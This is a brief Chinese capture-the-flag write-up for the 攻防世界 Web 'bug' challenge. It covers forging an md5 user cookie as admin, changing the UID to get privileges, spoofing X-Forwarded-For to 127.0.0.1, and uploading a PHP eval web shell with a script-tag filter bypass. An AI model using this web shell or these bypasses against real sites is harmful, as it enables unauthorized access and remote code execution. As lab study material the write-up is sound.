攻防世界Web-bug

打开链接

先注册一个账号

创建成功,会给一个UID=5

抓包的user值就是UID:用户名的md5加密的编码

点击Manage时要求admin用户

利用改包把user改成admin

1:admin的md5值为4b9987ccafacb8d8fc08d22bbca797ba

还要把url上的UID改为1

存在逻辑漏洞,成功越权

返回首页修改密码,之后以管理员的身份进去,点击manage

修改成功,重新登录

再点击Manage

显示ip不对,那就进行ip伪造

添加数据X-Forwarded-For:127.0.0.1

还是找不到flag

查看源代码

&do=???这部分表示有一个动作需要执行,但是具体的操作(???)没有给出,

试一下发现是upload

最后构造/index.php?module=filemanage&do=upload

不能直接上传一句话

需要绕过

<script language="php">@eval($ POST['11'])</script>

上传之后修改一下文件类型

相关推荐
一次旅行4 天前
网络安全总结
安全·web安全
一名优秀的码农4 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp4 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp4 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
上海云盾商务经理杨杨4 天前
2025年重大网络安全事件回顾与趋势分析
网络·安全·web安全
岛屿旅人4 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
上海云盾商务经理杨杨4 天前
2026年企业网络安全方向预防预测:在AI工业化时代构建主动免疫体系
人工智能·安全·web安全
努力的lpp4 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
志栋智能4 天前
安全超自动化:从被动防御到主动响应的革命
运维·网络·数据库·人工智能·安全·web安全·自动化
合天网安实验室4 天前
H5渗透实战:从负数金额漏洞到签名绕过
web安全·漏洞挖掘·h5渗透·签名绕过